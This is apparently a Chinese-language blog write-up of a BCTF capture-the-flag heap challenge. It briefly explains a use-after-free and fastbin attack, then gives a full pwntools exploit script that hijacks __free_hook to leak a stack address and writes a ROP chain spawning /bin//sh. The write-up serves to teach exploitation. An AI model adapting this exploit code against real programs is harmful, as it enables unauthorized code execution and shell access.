fastbin attack 利用

这也算是给自己补补堆溢出的姿势吧。

题目是一题来自bctf二月场的fastbin attack 非常经典的一题教学题,当时由于知识点没有get到,所以没做出来,一直放桌面,最近闲太碍眼了,开始日。

首先补一波fast bin attack的姿势,参考自freebuf:http://www.freebuf.com/news/88660.html

基本上看着这个就能做出题目了。

这题题目涉及到了两个考点1、UAF姿势 2、fastbin attack 的姿势

注意点是,malloc fastbin 会检测长度,如果长度不符合就会报错,就像下面这样。
1.png
所以需要使待malloc的fast chunk内的size符合要求。。(BTW chunk结构不多说了,自己去百度)这一般情况下需要自己去构造,不过这题例外,题目给出了利用点,即地址为0x6C4Aa0 ,所以说教学题。。很经典。。。

接着我们就可以任意地址写啦~~,不过我们的目的是要拿到shell,这题是静态编译的,所以我们可以考虑下用ropchain来拿shell

需要用rop的话,栈内的数据必须是我们可控的,目前手里有个任意地址写的漏洞,但是我们不知道栈的地址,所以我们接下去要做的就是拿到栈地址,需要有个函数来泄露栈地址。这边将free_hook修改成printf函数的地址,在调用free的时候会跳转到printf执行。泄露栈地址之后,将我们的rop写入栈,并执行。exp如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017-04-06 07:15:19
# @Author : WinterSun (511683586@qq.com)
# @Link : https://Winter3un.github.io/
from pwn import *
context(log_level="debug")
DEBUG = 1
if DEBUG:
p = process('./fast-fast-fast')
gdb.attach(p,"b*0x40141B\nc")
# else:
# p = remote()
def sl(data):
p.sendline(data)
def sd(data):
p.send(data)
def ru(data):
return p.recvuntil(data)
def create_fast(data):
ru("saysecret\n")
sl("1")
ru("delet\n")
sl('1')
ru("\n")
sl(data)
def edit_fast(data):
ru("saysecret\n")
sl("1")
ru("delet\n")
sl('2')
ru("\n")
sl(data)
def del_fast():
ru("saysecret\n")
sl("1")
ru("delet\n")
sl('3')
def create_small(data):
ru("saysecret\n")
sl("2")
ru("delet\n")
sl('1')
ru("\n")
sl(data)
def edit_small(data):
ru("saysecret\n")
sl("2")
ru("delet\n")
sl('2')
ru("\n")
sl(data)
def del_small():
ru("saysecret\n")
sl("2")
ru("delet\n")
sl('3')
def say():
ru("saysecret\n")
sl("3")
def edit(addr,data):
edit_fast(p64(1)+p64(0xFB0)+p64(addr))#change small chunk
edit_small(data)
def getchain():
from struct import pack
p = ''
p += pack('<Q', 0x0000000000401b97) # pop rsi ; ret
p += pack('<Q', 0x00000000006c1060) # @ .data
p += pack('<Q', 0x000000000044d8e4) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x00000000004714a1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401b97) # pop rsi ; ret
p += pack('<Q', 0x00000000006c1068) # @ .data + 8
p += pack('<Q', 0x000000000041c3cf) # xor rax, rax ; ret
p += pack('<Q', 0x00000000004714a1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401a83) # pop rdi ; ret
p += pack('<Q', 0x00000000006c1060) # @ .data
p += pack('<Q', 0x0000000000401b97) # pop rsi ; ret
p += pack('<Q', 0x00000000006c1068) # @ .data + 8
p += pack('<Q', 0x0000000000437835) # pop rdx ; ret
p += pack('<Q', 0x00000000006c1068) # @ .data + 8
p += pack('<Q', 0x000000000041c3cf) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464120) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000464e75) # syscall ; ret
return p
create_fast("aaa")
del_fast()
create_small("aaa")
del_fast()
create_fast("aaa")
del_fast()
edit_small(p64(0x6C4Aa0))
say()
create_fast(p64(0x6C4A80))
edit(0x6C3750,p64(0x4082A0))
edit(0x6C2710,"%8$llX")
del_small()
stack_addr = int(ru("\n")[:12],16)-0x18
print "stack_addr="+hex(stack_addr)
edit(stack_addr,getchain())
p.interactive()

×

你要赏我吃糖果吗?

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

文章目录
,
隐藏